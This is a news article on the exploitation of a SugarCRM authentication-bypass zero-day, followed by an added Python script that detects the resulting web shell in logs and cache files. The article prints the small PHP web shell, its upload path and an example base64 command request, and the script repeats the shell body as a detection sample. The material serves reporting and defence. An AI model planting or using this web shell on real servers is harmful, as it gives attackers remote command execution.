
Over the past two weeks, hackers have exploited a critical vulnerability in the SugarCRM (customer relationship management) system to infect users with malware that gave them complete control over their servers.
The vulnerability began as a zero-day when exploit code was posted online in late December. The person who posted the exploit described it as an authentication bypass leading to remote code execution, meaning an attacker can use it to execute malicious code on a vulnerable server without needing credentials. SugarCRM has since released an advisory confirming that description. The exploit post also included several “dorks”, simple web-search queries that anyone can run to find vulnerable servers on the internet.
Mark Ellzey, senior security researcher at network monitoring service Censys, said in an email that as of Jan. 11, the company had detected 354 SugarCRM servers compromised using the zero-day. That is nearly 12% of the 3,059 SugarCRM servers Censys discovered in total. As of last week, the United States had the highest number of compromised servers at 90, followed by Germany, Australia and France. In an update Tuesday, Censys said the number of infections hadn’t increased much since its findings were first posted.
A SugarCRM advisory published on January 5 states that a fix is now available and has already been applied to cloud-based services. It also advised users running instances outside of SugarCloud or SugarCRM-managed hosting to install the hotfix. According to the advisory, the vulnerability affected the Sugar Sell, Serve, Enterprise, Professional, and Ultimate software solutions. Sugar Market software was not affected.
According to Censys, the authentication bypass is performed against the /index.php/ path. “A successful authentication bypass will get a cookie from the service and send a second POST request to the path ‘/cache/images/sweet.phar’ to upload a small PNG encoded file containing PHP code. It will be executed by the server when another request is made,” the company’s researchers added.
Decoding the uploaded file with a hex dump shows that the PHP code it carries is roughly:
<?php
echo "#####";
passthru(base64_decode($_POST["c"]));
echo "#####";
?>
“This is a simple web shell that executes commands based on base64 encoded query argument values in ‘c’ (e.g. ‘POST /cache/images/sweet.phar?c=”L2Jpbi9pZA==” HTTP/1.1’, this will run the command “/bin/id” with the same privileges as the user id running the web service),” the post explains.
A web shell provides a text-based window that an attacker can use as an interface to execute commands or code of their choice on a compromised device. Censys’ Ellzey said the company doesn’t know exactly what the attackers are using the shell for.
Both Censys and SugarCRM advisories provide indicators of compromise that can be used to determine if a SugarCRM customer has been targeted. Users of vulnerable products should investigate and install the fix as soon as possible.
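The two details the article gives, the upload path ‘/cache/images/sweet.phar’ and the passthru()/base64_decode() body of the shell, are enough to build a first-pass check of a self-hosted instance. The following Python is an added example written for this page; it is not code from Censys, SugarCRM, or the advisories, and the access-log lines and file contents it scans are constructed samples. It assumes a combined-format web-server log, and it goes slightly beyond the page by also flagging any PHP-like extension under /cache/images/ and any file there that starts with a PNG header but contains PHP, since a renamed shell would not necessarily keep the name sweet.phar.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache/nginx "combined" style); not real traffic.
# Line 2 is the upload of the shell, line 3 a follow-up command matching the article's example.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jan/2023:10:12:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Jan/2023:10:12:03 +0000] "POST /cache/images/sweet.phar HTTP/1.1" 200 212 "-" "curl/7.81"
203.0.113.5 - - [09/Jan/2023:10:12:09 +0000] "POST /cache/images/sweet.phar?c=L2Jpbi9pZA== HTTP/1.1" 200 87 "-" "curl/7.81"
198.51.100.7 - - [09/Jan/2023:10:13:00 +0000] "GET /cache/images/logo.png HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

# Fields we need from a combined-format log line (assumed format, not from the article).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Path named in the Censys write-up quoted in the article.
SHELL_PATH = "/cache/images/sweet.phar"
# Assumption (broader than the page): any script-like extension in the image cache is suspicious.
SUSPICIOUS_EXT_RE = re.compile(r"^/cache/images/.*\.(phar|php\d?|phtml)$", re.IGNORECASE)

# Signature of the shell body shown in the article: passthru() over a base64-decoded POST field.
SHELL_BODY_RE = re.compile(rb"passthru\s*\(\s*base64_decode\s*\(\s*\$_POST\[")
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def decode_command(target: str) -> Optional[str]:
    """Decode a base64 'c' query parameter if one is present and well-formed, else return None.
    Parameters sent in the POST body never appear in an access log, so None does not mean benign."""
    values = parse_qs(urlsplit(target).query).get("c")
    if not values:
        return None
    raw = values[0].strip('"')
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def find_webshell_requests(log_text: str) -> List[Dict[str, Optional[str]]]:
    """Return one record per request to the known shell path or to any script-like file under /cache/images/."""
    hits: List[Dict[str, Optional[str]]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path = urlsplit(m["target"]).path
        if path == SHELL_PATH or SUSPICIOUS_EXT_RE.match(path):
            hits.append({
                "ip": m["ip"],
                "timestamp": m["ts"],
                "method": m["method"],
                "path": path,
                "status": m["status"],
                "decoded_command": decode_command(m["target"]),
            })
    return hits


def classify_cache_file(content: bytes) -> str:
    """Classify the bytes of a file found under /cache/images/.
    'webshell'     : carries the passthru/base64_decode body from the article
    'png-with-php' : PNG header followed by PHP code, but not the known shell body
    'clean'        : neither"""
    has_php = b"<?php" in content
    if has_php and SHELL_BODY_RE.search(content):
        return "webshell"
    if has_php and content.startswith(PNG_MAGIC):
        return "png-with-php"
    return "clean"


# Constructed file contents for the classifier: the article's shell behind a PNG header, and a plain PNG stub.
SAMPLE_SHELL = PNG_MAGIC + b'<?php echo "#####"; passthru(base64_decode($_POST["c"])); echo "#####"; ?>'
SAMPLE_PNG = PNG_MAGIC + b"\x00\x00\x00\rIHDR" + b"\x00" * 16

if __name__ == "__main__":
    for hit in find_webshell_requests(SAMPLE_LOG):
        print(hit)
    print(classify_cache_file(SAMPLE_SHELL), classify_cache_file(SAMPLE_PNG))
```

Run against a real log, the request records give the source addresses and timestamps to pivot on; a decoded command is a bonus, since the shell reads its argument from the POST body and most hits will show None. Treat any hit as a reason to pull the full indicator list from the Censys and SugarCRM advisories rather than as a complete answer.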